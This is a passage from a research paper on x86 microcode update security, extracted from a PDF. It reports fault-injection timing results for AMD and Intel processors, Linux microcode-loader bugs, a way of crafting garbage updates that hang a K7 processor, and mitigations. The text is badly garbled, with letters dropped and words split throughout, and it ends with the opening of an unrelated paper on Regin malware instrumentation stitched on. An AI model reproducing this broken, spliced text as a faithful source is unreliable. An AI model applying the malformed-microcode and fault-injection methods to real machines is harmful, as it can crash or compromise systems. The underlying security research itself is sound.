segmen t also result in early termination, but with a longer a v erage of 428864 cycles. Finally , c hanges to bit
3600 increased the length of time tak en b y the micro co de up date mec hanism to an a v erage of 4022609 cycles,
suggesting that this uniden tied v alue could corresp ond to some sort of length eld or additional op eration
ag. In comparison, p erforming the up date with an unmo died micro co de up date tak es on a v erage 20916597
cycles.
In con trast, fault injection tests on the 12h microarc hitecture indicates that encryption is not presen t
(gure 4). On a v erage, the micro co de up date mec hanism tak es 1116 cycles, with a sample standard deviation
of 132 cycles. Although mo dications to certain micro co de metadata elds (e.g. patc h ID, patc h data ID)
result in early termination, this is lik ely due to the mo died up date no longer app earing compatible with
the in ternal micro co de up date mec hanism. Ho w ev er, mo dications to the patc h data length eld indicate
that the v alue of this eld directly correlates to the n um b er of cycles, indicating that the micro co de up date
mec hanism utilizes this eld to determine the amoun t of patc h data to read from system memory .
6.1.1 Encryption
On the 15h microarc hitecture, binary comparison of m ultiple micro co de revisions for a single pro cessor
pro duces no useful similarities, indicating that a c hained blo c k or stream cipher is lik ely b eing used for
encryption.
Since c hanges to osets 672 through 2719, measuring exactly 2048 bits in size, result in early termination,
it is p ossible that this segmen t con tains a hash that is used to v erify the in tegrit y of the encrypted up date
data, in an encrypt-then-MA C approac h. Although it is p ossible to use the rev erse, MA C-then-encrypt, this
is rather unlik ely , as not only is it less secure, but 2048 bits is also rather long for the blo c k size of a blo c k
cipher.
6.1.2 Lin ux Up date Driv er
During our fault injection testing, w e encoun tered a n um b er of segmen tation faults caused b y the Lin ux
micro co de loader that could p oten tially b e problematic. In particular, the micro co de loader utilizes the
length elds within the micro co de up date pac k age to iterate through data or dynamically allo cate memory .
Due to the fact that individual up dates within up date pac k ages are prep ended b y a short header that
sp ecies its total size, and that the micro co de mo dule uses this v alue as a p oin ter oset to searc h through
a up date pac k age, an erroneous length can trigger in v alid k ernel paging requests b y iterating b ey ond the
13
0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8 2 2.2
·10400.511.522.533.544.555.5·106
Bit OffsetCyclesFault Injection Results (AMD FX-4100)Figure 3: AMD 15h microarc hitecture test results
allo cated buer. Similar problems also exist with the the size eld within the initial header of the mapping
table. A dding a c hec k to ensure that these osets do not exceed the buer size w ould resolv e this problem.
More bizarre, ho w ev er, is the fact that the micro co de mo dule cac hes up dates in ternally , with eviction
o ccurring only when a new er revision patc h is applied. As a result, if a user attempts to apply an in v alid
up date, whether delib erately mo died or acciden tally corrupted, it will b e in ternally cac hed b y the micro co de
mo dule, regardless of whether the up date applies successfully . Later attempts to p erform a micro co de up date
with the correct up date but of the same revision will then fail to apply , since the v ersion from the in ternal
cac he is preferred. Also note that the micro co de loader will refuse to load an up date with the same revision
as the curren tly installed v ersion. As a w ork around, the in ternal cac he can b e cleared b y unloading and
reloading the micro co de up date mo dule, or restarting the system. This issue could b e xed b y clearing the
cac he if an up date fails to apply , or alw a ys o v erwriting the in ternal cac he if the revisions are equal.
F urthermore, only the micro co de up date attempt for the rst logical pro cessor will actually read the
micro co de up date pac k age from the lesystem, and o v erwrite the in ternal micro co de cac he, if appropriate.
Micro co de up date attempts p erformed on other logical pro cessors will alw a ys read from the in ternal cac he
and fail if the cac he is empt y . This leads to unexp ected b eha vior; in a scenario where a micro co de up date
is triggered, the up date pac k age is remo v ed from the lesystem, and then the up date is triggered again, all
pro cessors but the rst will b e up dated from the in ternal cac he, since the rst will attempt to read from
14
500 1,000 1,500 2,000 2,500 3,000 3,500 4,000 4,500 5,000 5,500 6,000 6,500 7,000 7,500 8,0002004006008001,0001,2001,4001,6001,8002,0002,2002,4002,6002,8003,000
Bit OffsetCyclesFault Injection Results (AMD A8-3850 X4)Figure 4: AMD 12h microarc hitecture test results
the lesystem and terminate, while the others will use the in ternal cac he. This could b e xed b y ab orting a
micro co de up date if an y up date attempt for a logical pro cessor fails, instead of con tin uing regardless.
6.1.3 Micro co de
Although w e are still rev erse engineering the format of the micro co de instructions, w e are able to observ e
that a large n um b er of sequence con trol and instructions are shared b et w een individual micro co de up dates,
indicating that some blo c ks of micro co de are used in m ultiple pro cessors. All observ ed micro co de up dates
also ended with the 8001EFFFh or 8003DFFFh sequence con trol v alues.
Nev ertheless, w e w ere able to dev elop garbage micro co de up dates for a K7 microarc hitecture pro cessor,
whic h lac ks published micro co de due to the functionalit y b eing listed as an errata. By setting the initializa-
tion ag and lling the data blo c k of the micro co de up date with v alues suc h as 00000000h or FFFFFFFFh ,
p erforming a micro co de up date will cause nondeterministic hangs, lik ely due to the lac k of an exit signal
sequence con trol v alue causing the pro cessor to con tin ue executing micro co de b ey ond the patc h RAM. This
unpredictable b eha vior can manifest as hanging of the usermo de shell and k ernel thread resp onsible for
p erforming the micro co de up date, or ev en a complete lo c kup of the en tire system requiring a hard reb o ot.
15
6.2 In tel
W e w ere able to gather a dataset of 498 unique micro co de up dates for In tel pro cessors, dating from Jan uary
25th, 1995 through Septem b er 14, 2013. These span the P6 (1995) through Hasw ell (2013) microarc hitec-
tures, and can b e categorized in to three broad categories based on the target microarc hitecture, roughly
corresp onding to the P6/Core (P en tium through P en tium I I I, Core 2), Netburst (P en tium 4, P en tium D),
and A tom/Nehalem/Sandy Bridge (Core i3/i5/i7) pro cessor microarc hitectures. All of these up dates are
encrypted or otherwise obfuscated, although the mec hanism has clearly c hanged o v er time.
Examination of the metadata yields similar results to that of AMD micro co de up dates, including a
n um b er of up dates that corresp ond to pro cessors with CPUIDs that do not exist in an y online pro cessor
databases. These are lik ely micro co de up dates for in ternal testing or engineering sample pro cessors for whic h
the hardw are has nev er b een publicly released, but the micro co de has someho w leak ed. One micro co de up date
also con tains an in v alid date, lik ely o ccurring man ually during the pro cess of pac k aging micro co de up dates
for public release.
The rst and earliest category of micro co de up dates target the P6 and early Core microarc hitectures,
whic h include the P en tium and Core 2 families except the P en tium 4 and P en tium D. These up dates con tain
a data blo c k of 2000 or 4048 b ytes resp ectiv ely , with the former t ypically diering b y a 864 or 944 b yte
blo c k and the latter diering b y a 3096 b yte blo c k, b oth at a constan t oset when compared against other
revisions with the same pro cessor signature. A signican t n um b er of up dates also share common patc h data
blo c ks of sizes 1056 at oset 3e0h (less commonly at 390h or 398h for the early P en tium Pros), or 952 at
oset 3e0h and 104 at oset 798h, and 236 at c68h. This ma y indicate the presence of shared loader or exit
handler co de, or alternativ ely common patc hes for the same pro cessor errata.
The next category of In tel micro co de up dates target the the Netburst microarc hitecture (P en tium 4,
P en tium D, Celeron), and con tain a data blo c k size of 2000 through 7120 b ytes, in incremen ts of 1024. This
data blo c k app ears to b e unique and sho ws no signican t similarities when m ultiple revisions for the same
pro cessor signature are compared against eac h other.
Lastly , the nal category of In tel micro co de up dates consists primarily of the A tom, Nehalem and Sandy
Bridge microarc hitectures (Core i3/i5/i7), in addition to some new er Core 2 or P en tium 4 pro cessors. The
data blo c k size of these up dates ranges from 976 through 16336 b ytes in incremen ts of 1024, with the
exception of 3024 and 14288, plus 5120 b ytes. These up dates are unique in that they con tain an additional
undo cumen ted metadata header (table 8) of 96 b ytes in size within the binary patc h blo c k, as discussed
in [26].
6.2.1 Encryption
Based on our results, it app ears p ossible that the rst category of micro co de up dates is encrypted using a
blo c k cipher with a blo c k size of 8∗8 = 64 bits or less, where gcd(864, 944, 3096) = 8 . In addition, this blo c k
cipher do es not app ear to b e c hained, as c hanges to individual blo c ks can b e distinguished.
These results also supp ort the assertion b y some sources that the patc h data blo c k is not en tirely lled with
micro co de, but instead consists of patc h micro co de follo w ed b y a blo c k of randomly generated garbage data
to deter rev erse engineering [24]. In particular, patc h RAM only has capacit y for 60 micro co de instructions
on the P6, and at minim um only the rst 864 b ytes of eac h micro co de up date dier, with the latter often times
remaining constan t. Although it is p ossible that the latter could b e some sort of shared binary micro co de
section, an early micro co de up date released in 1995-09-05 for pro cessor signature 00000611h (P en tium Pro
150) with revision 000b0026h has the latter p ortion completely zero ed out. In addition, our fault injection
results sho w that mo dications to this latter blo c k do not aect acceptance of micro co de b y the pro cessor
(gure 5). ...
In addition, the same source also claims that the patc h data is split in to blo c ks of v arying lengths that
are enco ded dieren tly , and that it is comprised of a short initialization section follo w ed b y actual patc h
data [24], but this cannot b e conrmed without decryption of the patc h blo c k. Nev ertheless, it is a reasonable
conclusion, as a similar feature exists in AMD micro co de up dates.
Not m uc h is kno wn ab out the second category of micro co de up dates, although the nal category of
16
0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 1.1 1.2 1.3 1.4 1.5 1.6
·1048,7808,7908,8008,8108,8208,8308,8408,8508,8608,8708,880
Bit OffsetCyclesFault Injection Results (Intel Pentium II 233)Figure 5: In tel P2 microarc hitecture test results
up dates has b een rev ealed to con tain a shared 256 b yte RSA public k ey and 4 b yte exp onen t, whic h accoun ts
for the 260 b yte noted similarit y . This is follo w ed b y a RSA signature con taining a SHA-1 or SHA-2 hash
digest, and the actual patc h micro co de encrypted using the AES or DES blo c k cipher [26]. It is also b eliev ed
that encrypt-then-MA C is used.
7 Discussion
With the trend to w ards in tegrating m ultiple logical pro cessors within a single ph ysical pro cessor pac k age,
ensuring sync hronization of micro co de up dates b et w een pro cessors is a ma jor issue. In fact, man ufacturer
do cumen tation for In tel pro cessors [31] notes that micro co de up date facilities are not shared b et w een eac h
logical pro cessor, and m ust b e p erformed for eac h pro cessor. Ho w ev er, note that this b eha vior diers for
pro cessors incorp orating Hyp er-Threading T ec hnology, in whic h a single pro cessor core app ears as t w o
indep enden t logical pro cessors to the system. In this case, only one logical pro cessor p er core needs to load
the up date [31].
Breaking these sync hronization assumptions will lead to nondeterministic execution of program co de, with
op eration b eha vior dep ending on the sp ecic logical pro cessor that a program executes on. F or example,
if a micro co de up date is only loaded on three out of four cores on a pro cessor, then there roughly exists a
17
1/4 c hance of program co de executing on an unpatc hed pro cessor and causing unexp ected b eha vior. This
ma y b e particularly problematic if the program (i.e. op erating system) attempts to w ork around pro cessor
errata b y c hec king the curren t pro cessor revision, whic h will dier b et w een individual pro cessor cores. In
particular, consider the implications if it w ere not one pro cessor core left unpatc hed, but infected b y a
malicious micro co de up date. W ork is curren tly ongoing to examine this attac k v ector.
There exists similar implications for instruction primitiv es handled directly b y the micropro cessor suc h
as encryption or cryptographic op erations, whic h accen tuates the risk of micro co de attac ks due to their
imp ortance in ensuring the securit y and priv acy of mo dern computer systems. In particular, although
micro co de up dates cannot b e loaded in VMX non-ro ot op eration with a prop er h yp ervisor, attempted
up dates p erformed in VMX mo de can result in unpredictable system b eha vior, destabilizing the en tire
mac hine. Alternativ ely , a VMM can also drop attempts b y a virtual mac hine guest to write to the micro co de
up date MSR, while em ulating the micro co de up date signature during read of the micro co de revision MSR.
W e plan to lo ok in to man ufacturer-sp ecic p erformance information in order to determine c haracteristics
ab out the n um b er of micro co de instructions p er x86 instruction, as b enc hmarking micro co de instructions
ma y pro vide additional information ab out the execution path w a y of x86 instructions. On more recen t
In tel pro cessors, data ab out the n um b er of uops deco ded b y the micro co de sequencer and oating-p oin t
micro co de assists are recorded b y PEBS functionalit y , and is accessible from user mo de. A dditional fuzzing
with mo died micro co de can b e trac k ed b y examining PEBS functionalit y recording uops deco ded b y the
micro co de sequencer and oating-p oin t micro co de assists. Mo dications to the matc h registers and kno wn-
bad micro co de up date v alues w ould b e a slo w metho d to determine MR OM en try p oin t addresses for common
x86 instructions.
F rom a hardw are p ersp ectiv e, there exist a n um b er of p ossible additional analysis tec hniques. Hardw are-
based ep o xy decapping and analysis under a microscop e with fuming sulfuric acid has b een successful in
rev ealing the con ten ts of secret memories within micro con trollers, alb eit for a m uc h larger scale semicon-
ductor man ufacturing pro cess. Other tec hniques suc h as dieren tial p o w er analysis ha v e also b een sho wn
eectiv e in disclosing secret encryption k eys stored within commercial FPGAs, but ma y b e dicult to ap-
ply to micropro cessors due to increased silicon complexit y . There also exist proprietary ph ysical debugging
in terfaces for micropro cessors via exp osed surface moun t pads or land grid arra y pins, e.g. In tel's XDP or
other JT A G-st yle connectors, whic h ma y b e useful for obtaining more information ab out pro cessor in ternals.
It is in teresting to note that at least for earlier In tel micropro cessors, suc h as the P en tium Pro, pro cessor
micro co de w as the single largest source of bugs iden tied during the dev elopmen t pro cess, accoun ting for
o v er 30% of the total, whereas on the P en tium 4 pro cessor, micro co de accoun ted for less than 14% of the
bugs [7]. Nev ertheless, these statistics indicate that the lik eliho o d of disco v ering micro co de bugs is relativ ely
high, whic h could result in signican t securit y vulnerabilities.
8 Mitigation
Due to the fact that micro co de up date functionalit y is em b edded within the silicon of existing pro cessors,
there are no signican t mitigations that can b e directly applied, as c hanges to the micro co de up date mec h-
anism or encryption algorithms are imp ossible. Ho w ev er, since micro co de up dates require system privileges
to b e p erformed, users are advised to strengthen existing securit y protections, including user access con trols,
and ensure that access to pro cessor MSRs are appropriately ltered b y h yp ervisors, where applicable. Users
are also advised to reset the pro cessor to restore original pro cessor micro co de, although the in tegrit y of the
system BIOS/UEFI should b e v eried as w ell. Note that soft w are reb o ots using k exec-lik e functionalit y are
insucien t, as they only replace a running k ernel in system memory without actually resetting the pro cessor
itself.
Ho w ev er, there are a n um b er of c hanges that future dev elopmen t w ork in to pro cessor microarc hitecture
could incorp orate in order to prev en t these t yp es micro co de attac ks. Elimination of side c hannel analysis
v ectors could o ccur b y pausing  the pro cessor time-stamp coun ter (TSC) during micro co de up date op er-
ations. This could b e implemen ted in hardw are, or within the micro co de itself b y storing the v alue of the
time-stamp coun ter b efore and after the micro co de up date, then calculating the dierence and subtracting
18
it from the hardw are time-stamp coun ter b efore returning.
In addition, the timing path w a ys of digital circuitry could b e balanced to prev en t side c hannel attac ks
b y comparing the dierences in gate dela y b et w een successful and unsuccessful op eration path w a ys. This
w ould en tail the addition of clo c k cycle dela ys to certain micropro cessor op eration, whic h could ha v e a sligh t
impact on o v erall p erformance.
F urthermore, it ma y b e advisable to consider implemen ting so-called e-fuse capabilit y within pro cessors,
in whic h a fuse can b e blo wn b y the BIOS/UEFI or op erating system to disable further micro co de up dates.
Ho w ev er, a pro cessor reset could also reset the v alue of this fuse, preserving micro co de up date functionalit y
b y trusted sources suc h as BIOS/UEFI while otherwise disabling the b eha vior.
9 Conclusion
Our results sho w that micro co de attac ks are a viable attac k v ector against the securit y of x86 micropro cessors.
Due to the imp ortance of pro cessor micro co de in handling instruction deco de and execution for con temp orary
pro cessors, compromise of pro cessor micro co de can allo w an attac k er to mo dify an y existing instruction
for malicious purp oses, including in terfering with the op eration of virtual mac hine primitiv es or exception
handling for oating-p oin t n um b ers. P ossible attac k scenarios include compromising a h yp ervisor to allo w
escap e of malicious co de in to the host, or decreasing the precision of oating-p oin t instructions on nancial
computer systems. Due to the write-only nature of micro co de patc h RAM, these attac ks are extremely
dicult to prev en t against or detect, as it is imp ossible to read out the con ten ts of micro co de RAM or v erify
that a loaded micro co de up date is actually legitimate.
In fact, this class of attac ks is not limited to just pro cessor micro co de, but also aects other devices
connected to the system bus that can b e up dated b y an end-user, suc h as net w ork con trollers, graphics cards
(and their BIOS), storage driv e rm w are, or ev en optical driv e rm w are. Compromise of lo w-lev el in tegrated
remote managemen t functionalit y suc h as In tel vPro, A ctiv e Managemen t T ec hnology , or Managemen t Engine
could allo w malicious attac k ers to main tain a long-term p ersisten t infection while remaining in visible to
system administrators. Since man y of these devices ha v e direct memory access (DMA), an y compromise of
these devices can lead to virtually unrestricted system con trol, m uc h lik e with the FireWire DMA exploit.
More broadly , similar a ws ha v e b een demonstrated among a v ariet y of em b edded equipmen t suc h as
automobiles[11], credit cards[9], GPS receiv ers[36], net w ork devices[14], satellite phones[18], cell phones[6],
smart meters[38], p olice radios[13], and ev en programmable logic con trollers utilized b y utilit y grids and
n uclear facilities[12]. These results, in conjunction with our researc h on pro cessor micro co de, sho w that
em b edded rm w are is highly vulnerable, as hardw are man ufacturers do not pa y enough atten tion to w ards
ensuring the authen ticit y and in tegrit y of this em b edded soft w are, despite its signican t lev el of con trol
o v er platform hardw are and higher-lev el securit y mec hanisms. In fact, it is clear that man y hardw are
man ufacturers ha v e relied on the principle of securit y through obscurit y to k eep their rm w are secure, whic h
is not enough. As more and more devices are computerized with em b edded micropro cessors and connected
to larger net w orks, ensuring that rm w are is secure and bug-free will b ecome an increasingly imp ortan t
securit y c hallenge.
Ho w ev er, recen t publications indicate that b oth AMD [41] and In tel [22] ha v e b egun applying formal
v erication tec hniques to pro v e the op erational correctness of their resp ectiv e micro co de. Although the
limitations and scop e of these tec hniques is not externally apparen t, comprehensiv e application of suc h tec h-
niques could signican tly reduce the n um b er of p ost-silicon bugs and impro v e o v erall reliabilit y , eliminating
the need for end-user micro co de up dates.
10 A c kno wledgmen ts
W e w ould lik e to thank Dr. Mic hael Huth at Imp erial College London and Dr. Mic hael Goryll at Arizona
State Univ ersit y for their commen ts and suggestions.
19
References
[1] NEC Corp. v. In tel Corp, 1989.
[2] Ad v anced Micr o Devices. AMD AthlonTMPr o c essor Mo del 10 Revision Guide, Octob er 2003.
[3] Alexander, B., Anderson, A., Huntley, B., Neiger, G., R odgers, D., and Smith, L. Po w er
and Thermal Managemen t in the In telR⃝CoreTMDuo Pro cessor. Intel T e chnolo gy Journal 10 (2006).
[4] Alexander, B., Anderson, A., Huntley, B., Neiger, G., R odgers, D., and Smith, L. Arc hi-
tected for P erformance - Virtualization Supp ort on Nehalem and W estmere Pro cessors. Intel T e chnolo gy
Journal 13 (2010).
[5] Anonymous. Opteron Exp osed: Rev erse Engineering AMD K8 Micro co de Up dates, July 2004.
[6] Arapinis, M., Mancini, L., Ritter, E., R y an, M., Golde, N., Redon, K., and Bor ga onkar,
R. New priv acy issues in mobile telephon y: x and v erication. In Pr o c e e dings of the 2012 A CM
c onfer enc e on Computer and c ommunic ations se curity (New Y ork, NY, USA, 2012), CCS '12, A CM,
pp. 205216.
[7] Bentley, B., and Gra y, R. Validating the In telR⃝Pen tiumR⃝4 Pro cessor. Intel T e chnolo gy Journal
(Q1 2001).
[8] Boggs, D., Baktha, A., Ha wkins, J., Marr, D. T., Miller, J. A., R oussel, P., Singhal, R.,
Toll, B., and Venka traman, K. The Microarc hitecture of the In telR⃝Pen tiumR⃝4 Pro cessor on
90nm Tec hnology . Intel T e chnolo gy Journal 8 (2004).
[9] Bond, M., Choud ar y, O., Murdoch, S. J., Sk or oboga to v, S. P., and Anderson, R. J. Chip
and skim: cloning em v cards with the pre-pla y attac k. CoRR abs/1209.2531 (2012).
[10] Butler, M., Barnes, L., Sarma, D., and Gelinas, B. Bulldozer: An approac h to m ultithreaded
compute p erformance. Micr o, IEEE 31, 2 (Marc h 2011), 615.
[11] Check o w a y, S., McCo y, D., Kantor, B., Anderson, D., Sha cham, H., Sa v a ge, S., K oscher,
K., Czeskis, A., R oesner, F., and K ohno, T. Comprehensiv e exp erimen tal analyses of automotiv e
attac k surfaces. In Pr o c e e dings of the 20th USENIX c onfer enc e on Se curity (Berk eley , CA, USA, 2011),
SEC'11, USENIX Asso ciation, pp. 66.
[12] Chen, T., and Abu-Nimeh, S. Lessons from stuxnet. Computer 44, 4 (2011), 9193.
[13] Clark, S., Goodspeed, T., Metzger, P., W asserman, Z., Xu, K., and Blaze, M. Wh y (sp ecial
agen t) johnn y (still) can't encrypt: a securit y analysis of the ap co pro ject 25 t w o-w a y radio system. In
Pr o c e e dings of the 20th USENIX c onfer enc e on Se curity (Berk eley , CA, USA, 2011), SEC'11, USENIX
Asso ciation, pp. 44.
[14] Cui, A., and Stolf o, S. J. A quan titativ e analysis of the insecurit y of em b edded net w ork devices: re-
sults of a wide-area scan. In Pr o c e e dings of the 26th A nnual Computer Se curity Applic ations Confer enc e
(New Y ork, NY, USA, 2010), A CSA C '10, A CM, pp. 97106.
[15] de Vries, H. In tel Pen tium 4 North w o o d, April 2003.
[16] de Vries, H. AMD Deerhound Core (K8L-Rev.H), June 2006.
[17] Dombur g, J. Hard disk hac king, 2013.
[18] Driessen, B., Hund, R., Willems, C., P aar, C., and Holz, T. Don't trust satellite phones: A
securit y analysis of t w o satphone standards. In Se curity and Privacy (SP), 2012 IEEE Symp osium on
(2012), pp. 128142.
20
[19] Duflot, L., Perez, Y.-A., and Morin, B. What if y ou can't trust y our net w ork card? In R e c ent
A dvanc es in Intrusion Dete ction , R. Sommer, D. Balzarotti, and G. Maier, Eds., v ol. 6961 of L e ctur e
Notes in Computer Scienc e. Springer Berlin Heidelb erg, 2011, pp. 378397.
[20] Fel tham, D., Looi, C., Tir uv allu, K., Gar tler, H., Fleckenstein, C., Looi, L., St. Clair,
M., Spr y, B., Callahan, T., and Ma uri, R. The Road to Pro duction - Debugging and Testing the
Nehalem Family of Pro cessors. Intel T e chnolo gy Journal 14 (2010).
[21] F og, A. Instruction tables: Lists of instruction latencies, thr oughputs and micr o-op er ation br e akdowns
for Intel, AMD and VIA CPUs, F ebruary 2012.
[22] Franzén, A., Cima tti, A., Nadel, A., Sebastiani, R., and Shalev, J. Applying sm t in sym b olic
execution of micro co de. In Pr o c e e dings of the 2010 Confer enc e on F ormal Metho ds in Computer-A ide d
Design (Austin, TX, 2010), FMCAD '10, FMCAD Inc, pp. 121128.
[23] Godd ard, M. D., and Christie, D. S. Micro co de Aatc hing Apparatus and Metho d, August 1998.
[24] Gwennap, L. P6 Micro co de Can Be Patc hed. Micr opr o c essor R ep ort (Septem b er 1997).
[25] Haer tel, M. Sub ject: b o c hs still no go, Decem b er 2001.
[26] Ha wkes, B. Notes on In tel Micro co de Up dates, Marc h 2013.
[27] Hennessy, J. Computer A r chite ctur e: A Quantitative Appr o ach. Morgan Kaufmann/Elsevier,
W altham, MA, 2012.
[28] Hinton, G., Sa ger, D., Upton, M., Boggs, D., Carmean, D., Kyker, A., and R oussel, P.
The Microarc hitecture of the Pen tiumR⃝4 Pro cessor. Intel T e chnolo gy Journal (Q1 2001).
[29] Hong, Y. E., Leong, L. S., Choong, W. Y., Hou, L. C., and Adnan, M. An Ov erview of A d-
v anced F ailure Analysis T ec hniques for Pen tiumR⃝and Pen tiumR⃝Pro Micropro cessors. Intel T e chnolo gy
Journal (Q2 1998).
[30] Intel Corpora tion . IntelR⃝64 and IA-32 Ar chite ctur es Optimization Refer enc e Manual, April 2012.
[31] Intel Corpora tion. IntelR⃝64 and IA-32 Ar chite ctur es Softwar e Develop er's Manual, Marc h 2013.
[32] Ka gan, M., Gochman, S., Orenstien, D., and Lin, D. MMXTMMicroarc hitecture of Pen tiumR⃝
Pro cessors With MMX Tec hnology and Pen tiumR⃝I I Micropro cessors. Intel T e chnolo gy Journal (Q3
1997).
[33] Ka uer, B. Oslo: Impro ving the securit y of trusted computing. In Pr o c e e dings of 16th USENIX Se curity
Symp osium on USENIX Se curity Symp osium (Berk eley , CA, USA, 2007), SS'07, USENIX Asso ciation,
pp. 16:116:9.
[34] McGra th, K. J., and Pickett, J. K. Micro co de Patc h Device and Metho d for Patc hing Micro co de
Using Matc h Registers and Patc h Routines, August 2002.
[35] Molina, J., and Arba ugh, W. P6 Family Pro cessor Micro co de Up date Feature Review, Septem b er
2000.
[36] Nighsw ander, T., Led vina, B., Diamond, J., Br umley, R., and Br umley, D. Gps soft w are
attac ks. In Pr o c e e dings of the 2012 A CM c onfer enc e on Computer and c ommunic ations se curity (New
Y ork, NY, USA, 2012), CCS '12, A CM, pp. 450461.
[37] R ogers, A., Kaplan, D., Quinnell, E., and Kw an, B. The core-c6 (cc6) sleep state of the amd
b ob cat x86 micropro cessor. In Pr o c e e dings of the 2012 A CM/IEEE International Symp osium on L ow
Power Ele ctr onics and Design (New Y ork, NY, USA, 2012), ISLPED '12, A CM, pp. 367372.
21
[38] R ouf, I., Must af a, H., Xu, M., Xu, W., Miller, R., and Gr uteser, M. Neigh b orho o d w atc h:
securit y and priv acy analysis of automatic meter reading systems. In Pr o c e e dings of the 2012 A CM
c onfer enc e on Computer and c ommunic ations se curity (New Y ork, NY, USA, 2012), CCS '12, A CM,
pp. 462473.
[39] Stewin, P. A primitiv e for rev ealing stealth y p eripheral-based attac ks on the computing platform's
main memory . In R ese ar ch in A ttacks, Intrusions, and Defenses, S. J. Stolfo, A. Sta vrou, and C. V.
W righ t, Eds., v ol. 8145 of L e ctur e Notes in Computer Scienc e. Springer Berlin Heidelb erg, 2013, pp. 1
20.
[40] Sutton, J. A. Micro co de Patc h Authen tication, Octob er 2003.
[41] T ang, G., Bahal, R., W akefield, A., and Rama chandran, P. Generating amd micro co de stim uli
using v cs constrain t solv er. T ec h. rep., AMD, Inc and Synopsys, Inc, 2010.
[42] Thompson, K. Reections on Trusting Trust. Communic ations of the A CM 27, 8 (1984), 761763.
[43] W ojtczuk, R., and R utk o wska, J. A ttac king in telR⃝trusted execution tec hnology . Black Hat DC
(2009).
A App endix
A.1 Bundled In tel Micro co de on Windo ws
Date Pro cessor Signature Up date Revision Pro cessor Flags Chec ksum
2007-09-26 000006f2h 0x0000005ah 00000001h 594ddba0h
2007-03-15 000006f2h 0x00000057h 00000002h 07e77759h
2007-09-16 000006f6h 0x000000cbh 00000001h 6f5dfa09h
2007-09-16 000006f6h 0x000000cdh 00000004h a77fc94bh
2007-09-16 000006f6h 0x000000cc h 00000020h b5503da1h
2007-09-16 000006f7h 0x00000068h 00000010h 18729a7eh
2007-09-17 000006f7h 0x00000069h 00000040h 4e779cf4h
2007-09-24 000006fah 0x00000094h 00000080h 613b ce61h
2007-07-13 000006fbh 0x000000b6h 00000001h b3176c40h
2009-05-11 000006fbh 0x000000b9h 00000004h b6a7f0c9h
2009-04-28 000006fbh 0x000000b8h 00000008h 7db01441h
2007-07-13 000006fbh 0x000000b6h 00000010h 5e5a71a7h
2009-05-11 000006fbh 0x000000b9h 00000040h 70fed5b1h
2007-07-13 000006fbh 0x000000b6h 00000080h 2831cee4h
2007-08-13 000006fdh 0x000000a3h 00000001h 89c0d09eh
2007-08-13 000006fdh 0x000000a3h 00000020h 89c0d07fh
2007-08-13 000006fdh 0x000000a3h 00000080h 89c0d01fh
2005-04-21 00000f34h 0x00000017h 0000001dh 2cb d6146h
2005-04-21 00000f41h 0x00000016h 00000002h 0a12a70ah
2005-04-22 00000f41h 0x00000017h 000000b dh 326135c1h
2005-04-21 00000f43h 0x00000005h 0000009dh 77812c17h
2005-04-21 00000f44h 0x00000006h 0000009dh 9f60db18h
2005-04-21 00000f47h 0x00000003h 0000009dh af2cef0dh
2006-05-08 00000f48h 0x0000000c h 00000001h 5b9afec7h
2008-01-15 00000f48h 0x0000000eh 00000002h 0e158e10h
2005-06-30 00000f48h 0x00000007h 0000005fh d0938263h
22
2005-04-21 00000f49h 0x00000003h 000000b dh f85d53b8h
2005-12-14 00000f4ah 0x00000004h 0000005c h 5e7996d9h
2005-06-10 00000f4ah 0x00000002h 0000005dh dfb c9997h
2005-12-15 00000f62h 0x0000000fh 00000004h 0976d137h
2005-12-15 00000f64h 0x00000002h 00000001h 680b0995h
2005-12-23 00000f64h 0x00000004h 00000034h c66dbf02h
2006-04-26 00000f65h 0x00000008h 00000001h 5c58f575h
2006-07-14 00000f68h 0x00000009h 00000022h 0d8bb650h
2007-09-19 00010661h 0x00000038h 00000001h 8a2d6f19h
2007-03-16 00010661h 0x00000031h 00000002h 891e5cc8h
2007-03-16 00010661h 0x00000033h 00000080h 9e99cc48h
2008-01-19 00010676h 0x0000060c h 00000001h fbac0f6c h
2008-01-19 00010676h 0x0000060c h 00000004h fbac0f69h
2008-01-19 00010676h 0x0000060c h 00000010h fbac0f5dh
2008-01-19 00010676h 0x0000060c h 00000040h fbac0f2dh
2008-01-19 00010676h 0x0000060c h 00000080h fbac0eedh
2008-04-28 00010677h 0x00000705h 00000010h a6db99ddh
2008-04-09 0001067ah 0x00000a07h 00000011h 83067f5ah
2008-04-09 0001067ah 0x00000a07h 00000044h 83067f27h
2008-04-09 0001067ah 0x00000a07h 000000a0h 83067ecbh
2009-04-21 000106a4h 0x00000011h 00000003h 24e504ac h
2009-04-14 000106a5h 0x00000011h 00000003h c2d891c3h
2009-04-10 000106c2h 0x00000218h 00000004h 8fb7c1bah
2009-04-10 000106c2h 0x00000219h 00000008h 556338c1h
2009-08-25 000106cah 0x00000107h 00000001h f851a3d9h
2009-08-25 000106cah 0x00000107h 00000004h 7deb58b2h
2009-08-25 000106cah 0x00000107h 00000008h b e667ca5h
2009-08-25 000106cah 0x00000107h 00000010h 482cae0eh
2009-04-06 000106d1h 0x00000026h 00000008h deac5852h
2010-03-08 000106e4h 0x00000002h 00000009h b dbb308ah
2010-04-05 000106e5h 0x00000004h 00000013h f7762473h
2010-06-10 00020652h 0x0000000c h 00000012h 1e7b d02bh
2011-03-01 00020655h 0x00000002h 00000092h 267e87h
2010-06-18 000206c2h 0x0000000fh 00000003h fecacce7h
T able 14: Micro co de bundled within mcupdate_GenuineIntel.dll
23Malware Instrumentation
Application to Regin Analysis
tecamac@gmail.com
May 27, 2015
Sample SSDEEP: 6144:4OOGX+iQjsPMwZOFIxamN3uvCv7DFyP8jEl8vv5QsDq7Wer:4OHLixwZOFIRNiPFun58r
Abstract
The complexity of the Regin malware underlines the importance of reverse engi-
neering in modern incident response. The present study shows that such complexity
can be overcome: substantial information about adversary tactics, techniques and
procedures is obtained from reverse engineering.
An introduction to the Regin development framework is provided along with
an instrumentation guidelines. Such instrumentation enables experimentation with
malware modules. So analysis can derectly leverage malware’s own code without
the need to program an analysis toolkit.
As an application of the presented instrumentation, the underlying botnet ar-
chitecture is analysed. Finally conclusions from different perspectives are provided:
defense, attack and counter intelligence.
Contents
1 Design 2
1.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2 Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Remote Procedure Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
